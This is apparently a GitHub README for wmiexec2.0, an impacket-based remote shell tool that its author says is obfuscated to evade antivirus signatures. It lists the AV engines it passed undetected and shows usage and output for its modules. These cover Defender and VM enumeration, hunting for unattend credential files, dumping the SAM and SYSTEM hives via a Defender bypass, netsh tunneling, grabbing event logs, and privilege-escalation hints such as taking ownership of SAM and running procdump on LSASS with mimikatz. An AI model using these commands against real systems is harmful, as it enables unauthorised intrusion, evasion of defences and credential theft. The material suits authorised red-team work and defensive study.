Skip to content

wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines. It also has a handful of additional built in modules to help automate some common tasks on Red team engagements.

Notifications You must be signed in to change notification settings

ice-wzl/wmiexec2

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

67 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

wmiexec2.0

Overview

  • wmiexec2.0 is the same wmiexec that everyone knows and loves.
  • This 2.0 version is obfuscated to avoid well known signatures from various AV engines.
  • It also has a handful of additional built in modules to help automate some common tasks on Red team engagements.
  • This script is under active development and will improve with time.
  • If you find an issue or want a specific module throw me a PR.
  • Enjoy

Installation

  • Do not wget this file with GitHubs Raw feature, it will break the Ghost emoji. Git clone the repo and it will all work.
git clone https://github.com/ice-wzl/wmiexec2.git
cd wmiexec2/
pip3 install -r requirements.txt

Modules

  • Tested on:
#Windows Server 2022 Updated Febuary Defender Sigs
All modules working, no module flags
#Windows 10 Pro Defender Virus + Spyware Definition Version: 1.381.3595.0 2/14/2023
All modules working, no module flags
#Windows 10 Pro Kaspersky Standard App Version 21.8.5.452, Definitions 2/15/23
All modules working, no module flags
#Windows 8 Defender Virus and Spyware Definition Version: 1.383.35.0 2/15/2023
All modules working, no module flags
#Windows 7 Pro Defender Antispyware Definitions: v1.95.191.0 11/18/2010
Reg module not working, no module flags

Help

  • To view the help and available modules:
C:\>help

Connection

  • You can still connect to the remote machine the exact same way.
  • You can specify whether you want a powershell shell or a cmd shell by adding the flag --shell-type powershell or --shell-type cmd
  • Password auth + NT Hash auth still both apply
python3 wmiexec2.0.py DOMAIN/USERNAME:[email protected] -shell-type powershell
python3 wmiexec2.0.py WORKGROUP/Administrator:'Password123!@#'@10.0.0.4 -shell-type powershell

Normal wmiexec functionality

  • lcd {path} change directory on your local machine
  • exit you should know this one
  • lput {src_file} {dst_file} upload local file to remote machine path
  • lget {file} download remote file to your local machine
  • ! {cmd} execute local system command --> !ls lists your current directory on your local machine

Additional modules

  • Everything else from here and below is additional features added into wmiexec to make it wmiexec2.0
  • cat - just to make this more unix friendly simply uses type on the remote machine to view a file....just an alias you can use
  • ls || ls C:\Users - allows you to view your current target directory. Its executing the dir /a command so you will see hidden files by default without any other special options

Sysinfo

  • To see basic target information use this module
πŸ‘» PS C:\>  sysinfo
[*] Target
dockerw-vg85334\administrator

[*] Hostname
DOCKERW-VG85334

[*] Arch: 
PROCESSOR_ARCHITECTURE=AMD64

[*] IP Addresses: 
   Link-local IPv6 Address . . . . . : fe80::f45c:9e14:7b55:d0b2%4(Preferred) 
   IPv4 Address. . . . . . . . . . . : 20.20.20.21(Preferred)

Anti-Virus

  • View some well known security products running on the target system.
  • Enumerates the process list to see if they are running.
πŸ‘» PS C:\>  av
MsMpEng.exe

Defender

  • Check specific Defender settings
πŸ‘» PS C:\>  defender
[*] Defender Install Location
    InstallLocation    REG_SZ    C:\Program Files\Windows Defender\

[*] Defender Service is Running
[*] Defender Process Exclusions
	No Process Exclusions
[*] Defender Path Exclusions
[*] Tamper Protection is Disabled

VMcheck

  • Attempts to detect if you are in a virtual machine (So far works for ESXi/VMWare Workstation and QEMU)
  • Performs three checks
  • Looks for C:\Program Files\VMWare
  • Looks for common running executables in a proccess list
  • Pulls the System Manufactuer from host
πŸ‘» PS C:\>  vmcheck
[*] Common Processes: 
[*] No VM Processes found
C:\Program Files\VMware Not Present
OS Manufacturer:           Microsoft Corporation
System Manufacturer:       QEMU

[*] Virtual Box Detection
[!] Found VBox Files:
File Not Found
File Not Found

unattend

  • There are 11 files (that I know of) part of the unattend group in Windows that have the potential to have base64 encoded credentials in them. Find them all in one command
πŸ‘» PS C:\>  unattend
[*] Looking for: C:\unattend.txt, C:\unattend.inf

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features
    TamperProtection    REG_DWORD    0x1

End of search: 1 match(es) found.

[*] Looking for: C:\Windows\sysprep.inf
Nothing Found
[*] Looking for: C:\Windows\sysprep\sysprep.xml, C:\Windows\sysprep\sysprep.inf
Nothing Found
[*] Looking for: C:\Windows\Panther\Unattended.xml, C:\Windows\Panther\Unattend.xml
06/12/2024  04:33 PM            24,206 unattend.xml

[*] Looking for: C:\Windows\Panther\Unattend\Unattend.xml, C:\Windows\Panther\Unattend\Unattended.xml
Nothing Found
[*] Looking for: C:\Windows\System32\Sysprep\unattend.xml, C:\Windows\System32\Sysprep\unattended.xml
Nothing Found

Regrip

  • Save off the SAM, Security and System hives to your local machines. Defender blocks this by default, so I had to find a bypass working as of 6/7/24. Try to not get this signatured, thanks in advance.

Tunneling

  • Leverage Windows built in netsh tunneling without having to type the whole thing out
  • See below for usage options
πŸ‘» PS C:\>  showtun
πŸ‘» PS C:\>  addtun 10000 10.0.0.5 443
πŸ‘» PS C:\>  showtun



Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
*               10000       10.0.0.5        443


πŸ‘» PS C:\>  deltun 10000
πŸ‘» PS C:\>  showtun
πŸ‘» PS C:\>  

Loggrab

  • Download log file of your choice
  • Will download any file in C:\windows\system32\winevt\logs
  • Use: loggrab Security.evtx
πŸ‘» PS C:\>  loggrab Security.evtx
[*] Security.evtx
[*] Downloading C:\\Windows\system32\spool\drivers\color\Security.evtx


        1 file(s) copied.
πŸ‘» PS C:\>  !ls
av.py  debug.log  __pycache__  README.md  remoteshell.py  requirements.txt  Security.evtx  survey.conf	wmiexec2.py
πŸ‘» PS C:\>  

Tokens

  • This module will enumerate your currently Enabled tokens and attempt to match them with a priv esc
πŸ‘» PS C:\>  tokens
[*] SeImpersonate Enabled:
	Juicy-Potato
	RougeWinRM
	SweetPotato
	PrintSpoofer
[*] SeBackupPrivilege Enabled:
	https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1
	https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug
	https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610&ab_channel=IppSec
[*] SeTakeOwnershipPrivilege Enabled:
	takeown /f "C:\windows\system32\config\SAM"
	icacls "C:\windows\system32\config\SAM" /grant <your_username>:F
[*] SeDebugPrivilege Enabled:
	Procdump.exe on LSASS.exe, use mimikatz

Survey

  • under active development
  • Input your own custom commands into survey.conf file seperated by a new line, or use the basic one that I have provided
  • There are two options with this module:
  • run module with survey which will print out the command you ran plus the output of that command
  • Or run with survey savethis will return none of the commands to stdout, but will save all commands run and their output into survey.txt located in your local pwd.

survey save

  • to run the survey module and save the output to your local station (No stdout)
πŸ‘» PS C:\>  survey save
[*] Saving all output from survey to survey.txt in your local pwd
[*] Starting Survey
[*] Survey Completed
πŸ‘» PS C:\>  !ls
av.py  debug.log  __pycache__  README.md  remoteshell.py  requirements.txt  Security.evtx  survey.conf	survey.txt  wmiexec2.py
πŸ‘» PS C:\>  !head survey.txt
[*] hostname
 
DOCKERW-VG85334
[*] whoami
 
dockerw-vg85334\administrator
[*] whoami /priv
 
PRIVILEGES INFORMATION
----------------------
πŸ‘» PS C:\>  

survey

πŸ‘» PS C:\>  survey
[*] Starting Survey
[*] hostname

DOCKERW-VG85334

[*] whoami

dockerw-vg85334\administrator

[*] whoami /priv
--snip--

Known impacket issues

  • If you recieve this error:
python3 wmiexec2.py Administrator:'abc123!!!'@172.17.0.2 -shell-type powershell  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[-] Can't find a valid stringBinding to connect
  • This is usually caused when a target system is NAT'ed in some way. A target behind a router, a cloud VPS, or a docker container are three good examples that will cause this error.
  • To read more
  • fortra/impacket#272

To Fix

  • Find your dcomrt.py file (if you pip3 install -r requirements.txt) it should be under ~
find / -type f -name "dcomrt.py" 2>/dev/null
/opt/impacket-0.11.0/build/lib/impacket/dcerpc/v5/dcomrt.py
/opt/impacket-0.11.0/impacket/dcerpc/v5/dcomrt.py
/opt/Responder/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcomrt.py
/home/ubuntu/.local/lib/python3.10/site-packages/impacket/dcerpc/v5/dcomrt.py
  • Edit the file
vim /home/ubuntu/.local/lib/python3.10/site-packages/impacket/dcerpc/v5/dcomrt.py
  • Find this line
if stringBinding is None:
  • Comment out this line right before the above line
#raise Exception('Can\'t find a valid stringBinding to connect')
  • Add these two lines instead
stringBinding = 'ncacn_ip_tcp:%s%s' % (self.get_target(), bindingPort)
LOG.info('Can\'t find a valid stringBinding to connect,use default!')
  • That should fix the issue!

About

wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines. It also has a handful of additional built in modules to help automate some common tasks on Red team engagements.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages